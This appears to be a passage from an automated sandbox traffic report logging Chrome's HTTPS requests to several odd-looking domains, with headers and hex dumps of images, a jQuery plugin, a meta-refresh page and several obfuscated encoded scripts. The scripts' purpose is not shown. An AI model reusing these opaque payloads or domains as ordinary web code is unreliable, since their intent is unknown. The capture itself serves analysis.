                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-HUZ-MP-02-14
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-DG-CT-63-18
                                                                                                                                                          X-Cdn-Request-ID: 34451b32a3fa639e0ae5ef429d8c1238
                                                                                                                                                          2024-06-09 22:41:15 UTC6871INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 32 20 37 39 2e 31 36 30 39 32 34 2c 20 32 30 31 37 2f 30 37 2f 31 33 2d 30 31 3a 30 36 3a 33 39 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Ducky</http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          450192.168.2.550211183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC546OUTGET /ftl/bwin1768/plugin/js/myAnimate.js HTTP/1.1
                                                                                                                                                          Host: 8vpfnx.eveday.me
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC716INHTTP/1.1 200 OK
                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                          Content-Length: 4480
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: Default-server-KS-CLOUD-CHANGZ-MP-01-11
                                                                                                                                                          ETag: "658a8258-1180"
                                                                                                                                                          Date: Sat, 08 Jun 2024 01:32:45 GMT
                                                                                                                                                          Last-Modified: Tue, 26 Dec 2023 07:35:52 GMT
                                                                                                                                                          Expires: Mon, 08 Jul 2024 01:32:45 GMT
                                                                                                                                                          Age: 162509
                                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                          X-Cache: MISS
                                                                                                                                                          uuid: -
                                                                                                                                                          out-line: gb-cdn-205
                                                                                                                                                          x-link-via: dgct63:443;changzmp01:80;
                                                                                                                                                          X-Cache-Status: HIT from KS-CLOUD-CHANGZ-MP-01-11
                                                                                                                                                          X-Cache-Status: MISS from KS-CLOUD-DG-CT-63-31
                                                                                                                                                          X-Cdn-Request-ID: 1d9bd9f3b12d16236f08d984c73e9188
                                                                                                                                                          2024-06-09 22:41:15 UTC4480INData Raw: 2f 2a 2a e9 80 9a e7 94 a8 e5 8a a8 e7 94 bb 6a 51 75 65 72 79 e6 8f 92 e4 bb b6 20 20 20 20 6a 51 75 65 72 79 2d 61 6e 69 6d 61 74 65 2e 6a 73 20 20 20 e5 8a 9f e8 83 bd ef bc 9a e5 85 83 e7 b4 a0 e8 bf 9b e5 85 a5 e5 8f af e8 a7 86 e7 aa 97 e5 8f a3 ef bc 8c e6 89 a7 e8 a1 8c e5 8a a8 e7 94 bb 63 6c 61 73 73 ef bc 8c e5 8a a8 e7 94 bb 63 6c 61 73 73 e6 95 88 e6 9e 9c e8 87 aa e8 a1 8c e7 bc 96 e5 86 99 0a 0a 20 6d 61 64 65 20 62 79 20 e9 9d 92 e5 8f b6 20 69 6e 20 32 30 31 38 2e 31 30 2e 32 39 0a 0a 20 e6 8f 92 e4 bb b6 e4 bd bf e7 94 a8 ef bc 9a 24 28 27 79 6f 75 72 41 6e 69 6d 61 74 65 45 6c 65 6d 65 6e 74 27 29 2e 6d 79 41 6e 69 6d 61 74 65 28 7b 20 61 6e 69 6d 61 74 65 43 6c 61 73 73 3a 20 27 64 65 6d 6f 27 7d 29 3b 0a 0a 20 e4 bb a3 e7 a0 81 e5 88
                                                                                                                                                          Data Ascii: /**jQuery jQuery-animate.js classclass made by in 2018.10.29 $('yourAnimateElement').myAnimate({ animateClass: 'demo'});


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          451192.168.2.55022090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC578OUTGET /pc/240516-03/static/js/components/383/views/home/indexContainer.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:14 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 2200
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:40 GMT
                                                                                                                                                          ETag: "6645cac0-898"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[6],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,5],EU-FRA-paris-GLOBAL1-CACHE24[3],EU-FRA-paris-GLOBAL1-CACHE20[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467544
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 078a3f73a1cfb3261a19286c0419389b
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124456
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:15 UTC2200INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6a 41 42 67 47 59 41 57 41 58 51 42 6f 42 76 41 47 51 45 6b 41 6d 41 64 51 43 34 41 7a 41 56 7a 52 67 42 63 42 4c 64 54 43 48 4c 64 79 61 41 4a 53 55 41 52 4f 79 51 67 41 42 45 6d 34 41 6e 58 6a 30 6b 42 75 41 50 4a 67 41 56 69 42 34 41 36 41 43 59 68 57 76 4e 43 41 41 4b 53 6c 42 42 42 4c 75 41 54 30 77 6a 4a 41 66 54 63 67 6b 41 57 52 52 48 32 41 44 59 67 6b 6c 51 41 62 6c 41 42 37 43 44 4d 41 49 54 34 41 4c 35 69 36 75 46 4b 63 6c 41 41 76 47 69 59 6b 67 41 69 52 67 41 63 77 4a 4a 69 35 45 69 5a 42 6c 6c 51 4a 62 79 5a 32 66 67 77 45 4b 7a 46 35 45 71 31 6b 67 42 79 41 4a 6f 41 48 70 72 4e 4d 4f 6d 59 53 4a 68 69 6d 4a 54 78 35 4e 70 36 50
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjABgGYAWAXQBoBvAGQEkAmAdQC4AzAVzRgBcBLdTCHLdyaAJSUAROyQgABEm4AnXj0kBuAPJgAViB4A6ACYhWvNCAAKSlBBBLuAT0wjJAfTcgkAWRRH2ADYgklQAblAB7CDMAIT4AL5i6uFKclAAvGiYkgAiRgAcwJJi5EiZBllQJbyZ2fgwEKzF5Eq1kgByAJoAHprNMOmYSJhimJTx5Np6P


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          452192.168.2.55021990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC558OUTGET /pc/240516-03/static/js/components/noticeBox.js HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://wns732.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC637INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:15 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 7648
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:54 GMT
                                                                                                                                                          ETag: "6645cace-1de0"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE7[15],EU-GER-frankfurt-GLOBAL1-CACHE7[0,TCP_HIT,15],1.1 google
                                                                                                                                                          X-CCDN-Expires: 826094
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 37877a88f87abdcbfe8ee560e237f05c
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1765906
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:15 UTC7648INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 54 41 44 67 42 59 41 61 51 67 5a 67 45 59 42 64 59 67 62 77 43 49 4b 41 32 58 46 65 67 4c 67 44 4d 42 58 4e 47 41 46 77 43 57 36 54 50 32 49 68 69 67 67 4a 53 31 2b 41 4f 68 41 41 50 43 43 67 42 4f 2f 4a 41 46 35 42 6d 65 6f 51 43 63 6e 41 4b 72 30 70 6d 43 68 53 6b 42 66 59 76 56 77 41 35 4d 41 48 6b 4f 50 50 6b 4a 46 69 51 4d 6d 2f 51 44 73 41 47 71 4b 41 41 71 75 76 41 4c 43 61 4b 4c 69 50 72 62 36 66 67 6a 36 59 65 36 52 30 52 4c 53 44 4e 78 49 49 41 41 45 53 50 79 71 67 67 4c 30 41 4e 78 4f 59 41 42 57 49 41 4a 79 41 43 59 67 6e 49 4a 6f 49 4d 47 71 4b 42 41 67 36 67 43 65 6d 42 4c 30 41 50 72 39 49 45 67 41 73 69 69 31 33 41 41 32 49 50
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATADgBYAaQgZgEYBdYgbwCIKA2XFegLgDMBXNGAFwCW6TP2IhiggJS1+AOhAAPCCgBO/JAF5BmeoQCcnAKr0pmChSkBfYvVwA5MAHkOPPkJFiQMm/QDsAGqKAAquvALCaKLiPrb6fgj6Ye6R0RLSDNxIIAAESPyqggL0ANxOYABWIAJyACYgnIJoIMGqKBAg6gCemBL0APr9IEgAsii13AA2IP


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          453192.168.2.55022123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:14 UTC559OUTGET /pc/240516-03/static/js/components/382/footerImg.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:15 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 1192
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:37 GMT
                                                                                                                                                          ETag: "6645cabd-4a8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE4[4],EU-FRA-paris-GLOBAL1-CACHE11[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473793
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: f1df00b0ce7941ec4c074e4a7ab5b9cc
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118207
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:15 UTC1192INData Raw: 61 34 76 6a 65 75 75 65 28 22 4f 34 55 77 52 67 44 67 68 67 78 67 31 67 4b 51 4d 34 48 73 42 32 45 41 55 42 74 41 6e 41 44 67 46 59 42 64 41 47 67 47 38 41 46 41 64 67 46 73 41 6d 41 4c 67 44 4d 42 58 4e 47 41 46 77 45 74 31 4d 70 53 6e 55 6b 67 43 55 35 41 45 53 73 6b 49 41 41 52 4a 4f 41 4a 32 35 64 78 41 62 67 44 79 59 41 46 59 67 75 41 4f 67 41 6d 49 5a 74 7a 51 68 4b 43 6c 42 42 41 4c 4f 41 54 30 78 44 78 41 66 57 63 67 6b 41 57 52 51 48 57 41 47 78 44 69 46 41 42 75 55 4c 36 73 49 49 77 41 68 41 41 4d 41 4c 34 69 71 69 45 4b 4d 6d 67 41 76 45 69 59 34 74 45 77 45 4d 7a 69 49 71 51 67 71 65 51 47 55 4a 78 51 4c 4f 78 63 76 47 69 59 59 67 6f 67 6e 4b 77 4b 61 4f 52 49 43 6a 43 4d 34 6f 45 77 42 6d 69 55 5a 51 41 57 6a 47 69 47 78 6c 42 2b 6e 48 6f 41
                                                                                                                                                          Data Ascii: a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnADgFYBdAGgG8AFAdgFsAmALgDMBXNGAFwEt1MpSnUkgCU5AESskIAARJOAJ25dxAbgDyYAFYguAOgAmIZtzQhKClBBALOAT0xDxAfWcgkAWRQHWAGxDiFABuUL6sIIwAhAAMAL4iqiEKMmgAvEiY4tEwEMziIqQgqeQGUJxQLOxcvGiYYgognKwKaORICjCM4oEwBmiUZQAWjGiGxlB+nHoA


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          454192.168.2.55020238.174.148.164434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:15 UTC576OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                          Host: 43370d.top
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://43370d.top/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC17INHTTP/1.1 200 OK
                                                                                                                                                          2024-06-09 22:41:15 UTC34INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                                                                                                                          Data Ascii: Cache-Control: no-cache,no-store
                                                                                                                                                          2024-06-09 22:41:15 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: text/html; charset=utf-8
                                                                                                                                                          2024-06-09 22:41:15 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                                                                                                                          Data Ascii: Connection: close
                                                                                                                                                          2024-06-09 22:41:15 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                                                                                                                          Data Ascii: Transfer-Encoding: chunked
                                                                                                                                                          2024-06-09 22:41:15 UTC2INData Raw: 0d 0a
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-06-09 22:41:15 UTC5INData Raw: 35 38 62 0d 0a
                                                                                                                                                          Data Ascii: 58b
                                                                                                                                                          2024-06-09 22:41:15 UTC1426INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 32 3b 75 72 6c 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 5f 5f 43 42 4b 3d 33 39 32 38 34 31 33 62 64 63 39 66 63 64 32 30 63 39 62 65 39 33 33 36 63 37 32 36 35 38 34 65 62 31 37 31 37 39 37 32 38 37 36 5f 31 32 31 33 37 35 30 33 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2e 73 6b 2d 74 68 72 65 65 2d 62 6f 75 6e 63 65 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 74 6f 70 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 20 61 75 74 6f
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="refresh" content="2;url=/favicon.ico?__CBK=3928413bdc9fcd20c9be9336c726584eb1717972876_12137503" /><style type="text/css">.sk-three-bounce {position: absolute;top: 50%;left: 50%;margin: 40px auto


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          455192.168.2.55022690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:15 UTC647OUTGET /pc/image-pc/index/312/btn_forget_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:15 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1226
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Sat, 22 Jan 2022 09:11:29 GMT
                                                                                                                                                          ETag: "61ebca41-4ca"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE10[3],EU-FRA-paris-GLOBAL1-CACHE5[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465106
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 83f85dc995035899e948143eaf5c9bd6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126894
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:15 UTC1226INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 0e 08 06 00 00 00 1f 48 2d d1 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 35 20 37 39 2e 31 36 33 34 39 39 2c 20 32 30 31 38 2f 30 38 2f 31 33 2d 31 36 3a 34 30 3a 32 32 20 20
                                                                                                                                                          Data Ascii: PNGIHDRH-tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          456192.168.2.55022590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:15 UTC555OUTGET /pc/240516-03/static/js/components/homeCircle.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:15 UTC640INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:15 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 3620
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:58:49 GMT
                                                                                                                                                          ETag: "6645cac9-e24"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[4],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,3],EU-GER-frankfurt-GLOBAL1-CACHE14[193],EU-GER-frankfurt-GLOBAL1-CACHE8[0,TCP_HIT,191],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 72323b0c748267b5ded97c9a48ee35fc
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1274869
                                                                                                                                                          X-CCDN-Expires: 1317131
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
